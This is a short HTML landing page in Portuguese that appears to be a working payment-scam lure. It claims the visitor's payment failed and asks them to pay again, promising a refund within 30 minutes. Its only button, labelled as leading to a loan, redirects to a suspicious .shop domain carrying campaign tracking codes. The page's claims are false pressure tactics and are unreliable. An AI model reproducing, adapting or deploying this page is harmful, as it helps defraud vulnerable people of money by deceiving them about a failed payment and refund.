<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Página de Pré-carregamento</title>
    <style>
        /* Estilos básicos para centralizar o conteúdo */
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #f0f0f0;
        }
        .container {
            text-align: center;
        }
        .message {
            font-size: 24px;
            color: #333;
        }
        .button {
            margin-top: 20px;
            padding: 10px 20px;
            font-size: 16px;
            background-color: #4CAF50;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        .button:hover {
            background-color: #45a049;
        }
    </style>
</head>
<body>
    <div class="container">
        <p class="message">Informamos que ocorreu uma falha no processamento do seu pagamento. 
        Solicitamos que efetue o pagamento novamente. 
        O valor previamente pago será reembolsado e deverá ser creditado em sua conta bancária em até 30 minutos.</p>
        <button class="button" onclick="window.location.href='https://resgate-hoje-sim.shop/log2/pagar-pac/?utm_source=jLj673ab75e6fc800c79d96954b&utm_campaign=rKm-km-rKm&utm_medium=&utm_content=&utm_term=&xcod=jLj673ab75e6fc800c79d96954bhQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR&sck=jLj673ab75e6fc800c79d96954bhQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR';">Continue para conseguir pegar seu  Emprestimo</button>
    </div>
</body>
</html>
